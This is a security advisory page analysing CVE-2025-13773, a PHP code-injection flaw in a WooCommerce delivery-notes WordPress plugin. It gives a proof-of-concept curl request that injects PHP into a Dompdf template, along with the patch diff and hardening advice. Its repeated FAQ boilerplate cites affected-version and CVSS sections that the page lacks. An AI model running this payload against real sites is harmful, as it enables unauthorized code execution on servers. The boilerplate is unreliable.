How do I exploit CVE-2025-13773?

This security advisory provides educational information about CVE-2025-13773 for defensive security purposes. The technical analysis section explains the vulnerability mechanics, attack vectors, and exploitation methodology.

CVE-2025-13773 · exploit & PoC

Q: Is there a PoC (Proof of Concept) for CVE-2025-13773?

Yes, this security writeup includes detailed technical analysis and proof-of-concept information for CVE-2025-13773. Review the exploit breakdown and technical analysis sections for PoC details and code examples.

Q: What products and versions are affected by CVE-2025-13773?

CVE-2025-13773 - check the affected versions section of this security advisory for specific version ranges, vulnerable configurations, and compatibility information.

Q: How do I fix or patch CVE-2025-13773?

This security advisory includes detailed remediation steps for CVE-2025-13773. The patch analysis section provides specific guidance on updating to patched versions, applying workarounds, and implementing security controls.

Q: What is the CVSS score for CVE-2025-13773?

The severity and CVSS score details for CVE-2025-13773 are documented in this security advisory. Check the vulnerability details section for risk assessment information.

CVE-2025-13773 Exploit & Vulnerability Analysis

Complete CVE-2025-13773 security advisory with proof of concept (PoC), exploit details, and patch analysis.

December 24, 2025 cve_patchdiff:woocommerce-delivery-notes NVD ↗

By
Huseyn Gadashov (Dzn) · Application Security Researcher · OWASP

Exploit PoC Vulnerability Patch Analysis

The Exploit

An unauthenticated attacker can force the plugin to render attacker-supplied HTML through Dompdf with PHP evaluation enabled.

curl -sS -X POST "http://TARGET/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode 'action=wcdn_update' \
  --data-urlencode 'order_id=123' \
  --data-urlencode 'template=<html><body><?php file_put_contents(ABSPATH."wp-content/uploads/pwned.txt","pwned"); ?></body></html>'

curl -sS "http://TARGET/wp-content/uploads/pwned.txt"

The POST request is accepted by the plugin's update handler and the injected <?php ... ?> payload is executed on the server. The second request proves the exploit by returning the file created by the shell payload from the WordPress uploads path.

What the Patch Did

Before:

$options->set( 'isPhpEnabled', true );

After:

$options->set( 'isPhpEnabled', false );

The patch disables Dompdf's PHP execution feature using the Dompdf option isPhpEnabled. This prevents any PHP code embedded in the HTML passed to Dompdf from being evaluated during PDF rendering.

Root Cause

This is a code injection / remote code execution bug (CWE-95) where attacker-controlled HTML reaches Dompdf with PHP execution switched on. The plugin accepted a template or delivery-note payload in WooCommerce_Delivery_Notes::update, then fed it into Dompdf via includes/front/wcdn-front-function.php. Because isPhpEnabled was set to true, <?php ... ?> fragments in the rendered HTML were evaluated instead of being treated as inert text.

Why It Works

The only load-bearing change is the switch from true to false for isPhpEnabled. If Dompdf remains configured to allow PHP, injected PHP tags will still execute in the rendering engine. The rest of the Dompdf setup is just plumbing; disabling PHP evaluation is what closes the sink. Any additional security controls would be defense-in-depth, but the exploit hinges on this line.

Hardening Checklist

Add a capability check such as current_user_can('manage_woocommerce') in update callbacks before processing template data.
Protect state-changing requests with wp_verify_nonce() on AJAX or admin-post actions.
Escape user-controlled values before injecting them into HTML templates using esc_html(), esc_attr(), or wp_kses_post().
Keep Dompdf safe by disabling PHP execution: $options->set('isPhpEnabled', false);
Use admin_post_* / admin_ajax_* hooks and reject unauthenticated requests for admin-only operations.

References

https://nvd.nist.gov/vuln/detail/CVE-2025-13773

Frequently asked questions about CVE-2025-13773

What is CVE-2025-13773?

CVE-2025-13773 is a security vulnerability. This security advisory provides detailed technical analysis of the vulnerability, exploit methodology, affected versions, and complete remediation guidance.

Is there a PoC (proof of concept) for CVE-2025-13773?

Yes. This writeup includes proof-of-concept details and a technical exploit breakdown for CVE-2025-13773. Review the analysis sections above for the PoC walkthrough and code examples.

How does CVE-2025-13773 get exploited?

The technical analysis section explains the vulnerability mechanics, attack vectors, and exploitation methodology. PatchLeaks publishes this information for defensive and educational purposes.

What products and versions are affected by CVE-2025-13773?

CVE-2025-13773 — check the affected-versions section of this advisory for specific version ranges, vulnerable configurations, and compatibility information.

How do I fix or patch CVE-2025-13773?

The patch analysis section provides guidance on updating to patched versions, applying workarounds, and implementing compensating controls.

What is the CVSS score for CVE-2025-13773?

The severity rating and CVSS scoring for CVE-2025-13773 is documented in the vulnerability details section. Refer to the NVD entry for the current authoritative score.